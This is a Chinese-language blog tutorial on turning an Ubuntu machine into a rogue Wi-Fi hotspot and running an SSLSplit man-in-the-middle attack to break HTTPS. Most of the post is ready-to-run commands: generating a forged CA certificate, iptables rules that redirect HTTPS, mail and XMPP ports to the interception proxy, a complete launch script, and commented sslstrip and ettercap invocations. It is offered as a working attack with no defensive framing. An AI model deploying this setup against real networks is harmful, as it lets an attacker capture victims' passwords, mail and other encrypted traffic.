• 欢迎访问开心洋葱网站,在线教程,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入开心洋葱 QQ群
  • 为方便开心洋葱网用户,开心洋葱官网已经开启复制功能!
  • 欢迎访问开心洋葱网站,手机也能访问哦~欢迎加入开心洋葱多维思维学习平台 QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏开心洋葱吧~~~~~~~~~~~~~!
  • 由于近期流量激增,小站的ECS没能经的起亲们的访问,本站依然没有盈利,如果各位看如果觉着文字不错,还请看官给小站打个赏~~~~~~~~~~~~~!

ubuntu hostapd isc_dhcp_server SSLSplit 中间人攻击突破https

Linux 开心洋葱 2932次浏览 0个评论

ubuntu hostapd isc_dhcp_server SSLSplit 中间人攻击突破https

 

hostapd isc_dhcp_server 配置请查看本站以往的文章  跳转地址::  ubuntu kylin 上hostapd dnsmasq 搭建wifi热点AP NAT

 

安装libevent2.x:下载地址http://download.chinaunix.net/download/0006000/5804.shtml下载最新版本安装即可(此实验环境下载的是libevent-2.0.21-stable.tar.gz http://download.chinaunix.net/download.php?id=45065&ResourceID=5804)
安装Openssl:下载地址http://www.openssl.org/source/ (此实验环境下载的是openssl-1.0.1g.tar.gz http://www.openssl.org/source/openssl-1.0.1g.tar.gz  (MD5) (SHA1) (PGP sign))
安装sslsplit:https://github.com/droe/sslsplit 点击右侧下载zip包即可。
下载后解压安装 依次执行tar zxvf xx.tar.gz ; cd xx ; ./configure ; make ; make install
在不指定prefix=XX的情况下,默认安装到/usr/local/目录对于动态库安装后需要修改/etc/ld.so.conf加上.so所在目录 目前安装后为/usr/local/lib目录,把/usr/local/lib加入到ld.so.conf文件中后执行ldconfig将动态库信息加入缓存中以便相关程序查找使用。
安装完毕后可执行openssl及sslslplit -h查看openssl是否安装成功。
 
3、制作证书:
利用openssl制作ca以便为后续的客户端程序颁发伪造的证书,同时去除key的密码认证。
openssl req -new x509 -keyout ca.key -out ca.crt
openssl rsa -in ca.key -out ca.key.unsecure
 
4、执行sslsplit代理
将下面的信息加入到sslsplit.sh脚本中,后续启动直接执行sslsplit脚本即可。
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-ports 8080
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443
iptables -t nat -A PREROUTING -p tcp –dport 587 -j REDIRECT –to-ports 8443
iptables -t nat -A PREROUTING -p tcp –dport 465 -j REDIRECT –to-ports 8443
iptables -t nat -A PREROUTING -p tcp –dport 993 -j REDIRECT –to-ports 8443
iptables -t nat -A PREROUTING -p tcp –dport 5222 -j REDIRECT –to-ports 8080
 
sslsplit -D -l connections.log -j /tmp/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
如果发现端口被占用提示Error from bind() ip地址被占用时使用netstat -tanlp命令查看哪些端口被哪些进程占用,杀掉进程响应进程即可。
 
执行脚本:
 
#! /bin/sh
# 为无线添加路由规则
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t nat -A POSTROUTING -s 10.0.0.0/8 -o eth0 -j MASQUERADE
iptables -A FORWARD -s 10.0.0.0/8 -o eth0 -j ACCEPT
iptables -A FORWARD -d 10.0.0.0/8 -m conntrack --ctstate ESTABLISHED,RELATED -i eth0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

#sslsplit截获数据
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 10000

#dnsmasq与named一般情况下bind的named会占了53端口,
#  然后dnsmasq会启动不了,所以我用killall named来杀了named再启动dnsmasq。
nmcli r wifi off
rfkill unblock wlan
killall dhcpd
killall hostapd
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1
#“-B”后台运行,之后的hostapd.conf需要指名路径.
hostapd -B /etc/hostapd-hostapd.conf
#/etc/init.d/dnsmasq restart
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid wlan0
/etc/init.d/isc-dhcp-server restart
ifconfig br0 down
brctl delbr br0
# dnsmasq启动后会出现电脑突然上不了网,
# 因为dnsmasq更改了/etc/resolv.conf的原因。可以在/etc/resolv.conf加一行
# nameserver x.x.x.x
#填入DNS服务器地址,根据自己的情况修改。
echo "nameserver 219.147.1.66" >> /etc/resolv.conf
echo "nameserver 222.173.107.2" >> /etc/resolv.conf
echo 1 >/proc/sys/net/ipv4/ip_forward

#nameserver 219.147.1.66
#nameserver 222.173.107.2

sslsplit -D -l ~/openssl/logdir/connections.log  -L ~/openssl/logdir/a.log -k ~/openssl/ca.key -c ~/openssl/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 10000
#gnome-terminal -x bash -c "sslstrip -l 10000;read"
#gnome-terminal -x bash -c "ettercap -Tpuqi wlan0;read"

主目录创建:openssl/logdir目录 root权限运行  

 

参考文章:http://download.chinaunix.net/download.php?id=45065&ResourceID=5804

 

 


开心洋葱 , 版权所有丨如未注明 , 均为原创丨未经授权请勿修改 , 转载请注明ubuntu hostapd isc_dhcp_server SSLSplit 中间人攻击突破https
喜欢 (0)

您必须 登录 才能发表评论!

加载中……